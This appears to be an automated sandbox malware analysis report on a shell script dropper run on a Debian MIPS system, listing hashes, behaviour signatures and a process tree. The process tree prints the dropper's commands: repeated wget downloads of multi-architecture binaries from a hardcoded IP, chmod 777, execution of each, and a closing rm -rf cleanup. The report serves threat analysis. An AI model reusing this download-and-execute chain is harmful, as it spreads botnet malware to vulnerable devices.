Analysis

  • max time kernel
    145s
  • max time network
    148s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240611-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    02-07-2024 05:54

General

  • Target

    qkdjdjj22.sh

  • Size

    1KB

  • MD5

    536b6c9024361ab349363a6a55c2a2b8

  • SHA1

    d0aec54b19e3e9c9cd68dafe08c4cb6525d8435a

  • SHA256

    ac40e30ea6ab94b1102940d16c575f7c87dbe6335530e37f568c4ac2d967f53d

  • SHA512

    731b4d784a0b56464dba291fd0e43ee4f99cb2457c54cb91af21ee4c339aecc204c8a9dd592ba87017657752fdcbc6d4b6856f01dbbceefebcfc27affc673954

Score
6/10

Malware Config

Signatures

  • Reads system routing table 1 TTPs 1 IoCs

    Gets active network interfaces from /proc virtual filesystem.

  • Reads system network configuration 1 TTPs 1 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Writes file to tmp directory 11 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/qkdjdjj22.sh
    /tmp/qkdjdjj22.sh
    1⤵
      PID:709
      • /usr/bin/wget
        wget http://195.85.205.47/qkdjdjj22.mips
        2⤵
        • Writes file to tmp directory
        PID:715
      • /bin/chmod
        chmod 777 qkdjdjj22.mips
        2⤵
          PID:737
        • /tmp/qkdjdjj22.mips
          ./qkdjdjj22.mips
          2⤵
            PID:738
          • /usr/bin/wget
            wget http://195.85.205.47/qkdjdjj22.mpsl
            2⤵
            • Writes file to tmp directory
            PID:740
          • /bin/chmod
            chmod 777 qkdjdjj22.mpsl
            2⤵
              PID:741
            • /tmp/qkdjdjj22.mpsl
              ./qkdjdjj22.mpsl
              2⤵
              • Reads system routing table
              • Reads system network configuration
              PID:742
            • /usr/bin/wget
              wget http://195.85.205.47/qkdjdjj22.sh4
              2⤵
              • Writes file to tmp directory
              PID:745
            • /bin/chmod
              chmod 777 qkdjdjj22.sh4
              2⤵
                PID:746
              • /tmp/qkdjdjj22.sh4
                ./qkdjdjj22.sh4
                2⤵
                  PID:747
                • /usr/bin/wget
                  wget http://195.85.205.47/qkdjdjj22.x86
                  2⤵
                  • Writes file to tmp directory
                  PID:749
                • /bin/chmod
                  chmod 777 qkdjdjj22.x86
                  2⤵
                    PID:755
                  • /tmp/qkdjdjj22.x86
                    ./qkdjdjj22.x86
                    2⤵
                      PID:757
                    • /usr/bin/wget
                      wget http://195.85.205.47/qkdjdjj22.arm6
                      2⤵
                      • Writes file to tmp directory
                      PID:759
                    • /bin/chmod
                      chmod 777 qkdjdjj22.arm6
                      2⤵
                        PID:778
                      • /tmp/qkdjdjj22.arm6
                        ./qkdjdjj22.arm6
                        2⤵
                          PID:779
                        • /usr/bin/wget
                          wget http://195.85.205.47/qkdjdjj22.x32
                          2⤵
                          • Writes file to tmp directory
                          PID:782
                        • /bin/chmod
                          chmod 777 qkdjdjj22.x32
                          2⤵
                            PID:792
                          • /tmp/qkdjdjj22.x32
                            ./qkdjdjj22.x32
                            2⤵
                              PID:794
                            • /usr/bin/wget
                              wget http://195.85.205.47/qkdjdjj22.ppc
                              2⤵
                              • Writes file to tmp directory
                              PID:799
                            • /bin/chmod
                              chmod 777 qkdjdjj22.ppc
                              2⤵
                                PID:806
                              • /tmp/qkdjdjj22.ppc
                                ./qkdjdjj22.ppc
                                2⤵
                                  PID:808
                                • /usr/bin/wget
                                  wget http://195.85.205.47/qkdjdjj22.i586
                                  2⤵
                                  • Writes file to tmp directory
                                  PID:810
                                • /bin/chmod
                                  chmod 777 qkdjdjj22.i586
                                  2⤵
                                    PID:811
                                  • /tmp/qkdjdjj22.i586
                                    ./qkdjdjj22.i586
                                    2⤵
                                      PID:812
                                    • /usr/bin/wget
                                      wget http://195.85.205.47/qkdjdjj22.m68k
                                      2⤵
                                      • Writes file to tmp directory
                                      PID:814
                                    • /bin/chmod
                                      chmod 777 qkdjdjj22.m68k
                                      2⤵
                                        PID:815
                                      • /tmp/qkdjdjj22.m68k
                                        ./qkdjdjj22.m68k
                                        2⤵
                                          PID:816
                                        • /usr/bin/wget
                                          wget http://195.85.205.47/qkdjdjj22.ppc
                                          2⤵
                                          • Writes file to tmp directory
                                          PID:818
                                        • /bin/chmod
                                          chmod 777 qkdjdjj22.ppc
                                          2⤵
                                            PID:819
                                          • /tmp/qkdjdjj22.ppc
                                            ./qkdjdjj22.ppc
                                            2⤵
                                              PID:820
                                            • /usr/bin/wget
                                              wget http://195.85.205.47/qkdjdjj22.arm4
                                              2⤵
                                              • Writes file to tmp directory
                                              PID:822
                                            • /bin/chmod
                                              chmod 777 qkdjdjj22.arm4
                                              2⤵
                                                PID:823
                                              • /tmp/qkdjdjj22.arm4
                                                ./qkdjdjj22.arm4
                                                2⤵
                                                  PID:824
                                                • /usr/bin/wget
                                                  wget http://195.85.205.47/qkdjdjj22.arm5
                                                  2⤵
                                                    PID:826
                                                  • /bin/rm
                                                    rm -rf qkdjdjj22.arm4 qkdjdjj22.arm6 qkdjdjj22.i586 qkdjdjj22.m68k qkdjdjj22.mips qkdjdjj22.mpsl qkdjdjj22.ppc qkdjdjj22.ppc.1 qkdjdjj22.sh qkdjdjj22.sh4 qkdjdjj22.x32 qkdjdjj22.x86
                                                    2⤵
                                                      PID:827

                                                  Network

                                                  MITRE ATT&CK Matrix ATT&CK v13

                                                  Replay Monitor

                                                  Loading Replay Monitor...

                                                  Downloads